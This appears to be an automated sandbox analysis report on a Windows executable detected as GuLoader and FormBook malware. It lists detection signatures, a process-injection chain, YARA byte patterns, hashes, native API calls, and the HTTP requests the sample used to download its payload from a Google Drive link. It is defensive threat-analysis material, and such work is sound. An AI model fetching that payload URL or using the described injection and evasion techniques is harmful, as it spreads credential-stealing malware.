Windows Analysis Report
PEDIDO-144848.exe

Overview

General Information

Sample name: PEDIDO-144848.exe
Analysis ID: 1528317
MD5: 0d9f261233df472092fbfbb1e982bbe7
SHA1: 003feaf99830b2aac6213ede7d72b148b709da0b
SHA256: 57e01b9f47d3220585bdef71852add983d96d959c08b961b1f2795ef07d78160
Infos:

Detection

FormBook, GuLoader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • PEDIDO-144848.exe (PID: 7604 cmdline: "C:\Users\user\Desktop\PEDIDO-144848.exe" MD5: 0D9F261233DF472092FBFBB1E982BBE7)
    • PEDIDO-144848.exe (PID: 7228 cmdline: "C:\Users\user\Desktop\PEDIDO-144848.exe" MD5: 0D9F261233DF472092FBFBB1E982BBE7)
      • RAVCpl64.exe (PID: 6432 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • SecEdit.exe (PID: 4508 cmdline: "C:\Windows\SysWOW64\SecEdit.exe" MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • explorer.exe (PID: 4968 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup
No configs have been found
Source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2bf40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1400f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2bf40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1400f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
        No Sigma rule has matched
        Timestamp: 2024-10-07T19:25:58.193729+0200, SID: 2803270, Severity: 2, Classtype: Potentially Bad Traffic, Source IP: 192.168.11.20, Source Port: 49748, Destination IP: 142.250.80.46, Destination Port: 443, Protocol: TCP

        AV Detection

        Source: PEDIDO-144848.exeReversingLabs: Detection: 23%
        Source: Yara matchFile source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: PEDIDO-144848.exeJoe Sandbox ML: detected
        Source: PEDIDO-144848.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:49748 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.40.97:443 -> 192.168.11.20:49749 version: TLS 1.2
        Source: PEDIDO-144848.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: SecEdit.pdb source: PEDIDO-144848.exe, 00000002.00000003.115513057373.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: SecEdit.pdbGCTL source: PEDIDO-144848.exe, 00000002.00000003.115513057373.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: PEDIDO-144848.exe, 00000002.00000003.115463317086.0000000036A24000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115459604949.000000003687C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PEDIDO-144848.exe, PEDIDO-144848.exe, 00000002.00000003.115463317086.0000000036A24000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115459604949.000000003687C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe
        Source: Binary string: mshtml.pdbUGP source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405642
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_004060A4 FindFirstFileA,FindClose,0_2_004060A4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 4x nop then mov ebx, 00000004h2_2_369004DE
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4x nop then mov ebx, 00000004h4_2_02ED04DE
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49748 -> 142.250.80.46:443
        Source: global trafficHTTP traffic detected:
            GET /uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.google.com
            Cache-Control: no-cache
        Source: global trafficHTTP traffic detected:
            GET /download?id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU&export=download HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Cache-Control: no-cache
            Host: drive.usercontent.google.com
            Connection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: PEDIDO-144848.exe, PEDIDO-144848.exe, 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmp, PEDIDO-144848.exe, 00000000.00000000.113760696755.0000000000409000.00000008.00000001.01000000.00000003.sdmp, PEDIDO-144848.exe, 00000002.00000000.115002326935.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: PEDIDO-144848.exe, 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmp, PEDIDO-144848.exe, 00000000.00000000.113760696755.0000000000409000.00000008.00000001.01000000.00000003.sdmp, PEDIDO-144848.exe, 00000002.00000000.115002326935.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: PEDIDO-144848.exe, 00000002.00000003.115460520041.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: PEDIDO-144848.exe, 00000002.00000003.115460520041.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115560534476.0000000006B18000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115560493823.0000000006AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU
        Source: PEDIDO-144848.exe, 00000002.00000003.115460520041.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU2
        Source: PEDIDO-144848.exe, 00000002.00000002.115560534476.0000000006B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU3
        Source: PEDIDO-144848.exe, 00000002.00000002.115560534476.0000000006B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU5v
        Source: PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: PEDIDO-144848.exe, 00000002.00000003.115461027098.0000000006B6E000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115460098433.0000000006B73000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115560757589.0000000006B6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU&export=download
        Source: PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/h
        Source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_004050F7 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_004050F7

        E-Banking Fraud

        Source: Yara matchFile source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C434E0 NtCreateMutant,LdrInitializeThunk,2_2_36C434E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_36C42EB0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_36C42D10
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_36C42BC0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_36C42B90
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C44570 NtSuspendThread,2_2_36C44570
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C44260 NtSetContextThread,2_2_36C44260
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42EC0 NtQuerySection,2_2_36C42EC0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42ED0 NtResumeThread,2_2_36C42ED0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42E80 NtCreateProcessEx,2_2_36C42E80
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42E50 NtCreateSection,2_2_36C42E50
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42E00 NtQueueApcThread,2_2_36C42E00
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42FB0 NtSetValueKey,2_2_36C42FB0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42F00 NtCreateFile,2_2_36C42F00
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42F30 NtOpenDirectoryObject,2_2_36C42F30
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42CD0 NtEnumerateKey,2_2_36C42CD0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42CF0 NtDelayExecution,2_2_36C42CF0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C43C90 NtOpenThread,2_2_36C43C90
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42C50 NtUnmapViewOfSection,2_2_36C42C50
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42C10 NtOpenProcess,2_2_36C42C10
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42C20 NtSetInformationFile,2_2_36C42C20
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C43C30 NtOpenProcessToken,2_2_36C43C30
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42C30 NtMapViewOfSection,2_2_36C42C30
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42DC0 NtAdjustPrivilegesToken,2_2_36C42DC0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42DA0 NtReadVirtualMemory,2_2_36C42DA0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42D50 NtWriteVirtualMemory,2_2_36C42D50
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42AC0 NtEnumerateValueKey,2_2_36C42AC0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42A80 NtClose,2_2_36C42A80
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42AA0 NtQueryInformationFile,2_2_36C42AA0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42A10 NtWriteFile,2_2_36C42A10
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42BE0 NtQueryVirtualMemory,2_2_36C42BE0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42B80 NtCreateKey,2_2_36C42B80
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42B00 NtQueryValueKey,2_2_36C42B00
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42B10 NtAllocateVirtualMemory,2_2_36C42B10
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42B20 NtQueryInformationProcess,2_2_36C42B20
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C438D0 NtGetContextThread,2_2_36C438D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C429D0 NtWaitForSingleObject,2_2_36C429D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C429F0 NtReadFile,2_2_36C429F0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36913719 NtSuspendThread,2_2_36913719
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36913A39 NtResumeThread,2_2_36913A39
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_369133F9 NtSetContextThread,2_2_369133F9
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A34E0 NtCreateMutant,LdrInitializeThunk,4_2_030A34E0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2B00 NtQueryValueKey,LdrInitializeThunk,4_2_030A2B00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_030A2B10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2B80 NtCreateKey,LdrInitializeThunk,4_2_030A2B80
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_030A2B90
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_030A2BC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2A80 NtClose,LdrInitializeThunk,4_2_030A2A80
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A29F0 NtReadFile,LdrInitializeThunk,4_2_030A29F0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2F00 NtCreateFile,LdrInitializeThunk,4_2_030A2F00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2E50 NtCreateSection,LdrInitializeThunk,4_2_030A2E50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_030A2D10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2C30 NtMapViewOfSection,LdrInitializeThunk,4_2_030A2C30
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2CF0 NtDelayExecution,LdrInitializeThunk,4_2_030A2CF0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A4260 NtSetContextThread,4_2_030A4260
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A4570 NtSuspendThread,4_2_030A4570
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2B20 NtQueryInformationProcess,4_2_030A2B20
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2BE0 NtQueryVirtualMemory,4_2_030A2BE0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2A10 NtWriteFile,4_2_030A2A10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2AA0 NtQueryInformationFile,4_2_030A2AA0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2AC0 NtEnumerateValueKey,4_2_030A2AC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A29D0 NtWaitForSingleObject,4_2_030A29D0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A38D0 NtGetContextThread,4_2_030A38D0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2F30 NtOpenDirectoryObject,4_2_030A2F30
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2FB0 NtSetValueKey,4_2_030A2FB0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2E00 NtQueueApcThread,4_2_030A2E00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2E80 NtCreateProcessEx,4_2_030A2E80
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2EB0 NtProtectVirtualMemory,4_2_030A2EB0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2EC0 NtQuerySection,4_2_030A2EC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2ED0 NtResumeThread,4_2_030A2ED0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2D50 NtWriteVirtualMemory,4_2_030A2D50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2DA0 NtReadVirtualMemory,4_2_030A2DA0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2DC0 NtAdjustPrivilegesToken,4_2_030A2DC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2C10 NtOpenProcess,4_2_030A2C10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2C20 NtSetInformationFile,4_2_030A2C20
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A3C30 NtOpenProcessToken,4_2_030A3C30
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2C50 NtUnmapViewOfSection,4_2_030A2C50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A3C90 NtOpenThread,4_2_030A3C90
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2CD0 NtEnumerateKey,4_2_030A2CD0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDEEBA NtQueryInformationProcess,4_2_02EDEEBA
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EE3A48 NtResumeThread,4_2_02EE3A48
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EE3728 NtSuspendThread,4_2_02EE3728
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EE3408 NtSetContextThread,4_2_02EE3408
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EE3D68 NtQueueApcThread,4_2_02EE3D68
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403180
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeFile created: C:\Windows\Fonts\prelegacy
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeFile created: C:\Windows\Fonts\prelegacy\prster
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0AD002_2_36C0AD00
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCFD272_2_36CCFD27
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCFA892_2_36CCFA89
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2FAA02_2_36C2FAA0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCEA5B2_2_36CCEA5B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCCA132_2_36CCCA13
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C84BC02_2_36C84BC0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10B102_2_36C10B10
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C4DB192_2_36C4DB19
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCFB2E2_2_36CCFB2E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C128C02_2_36C128C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC18DA2_2_36CC18DA
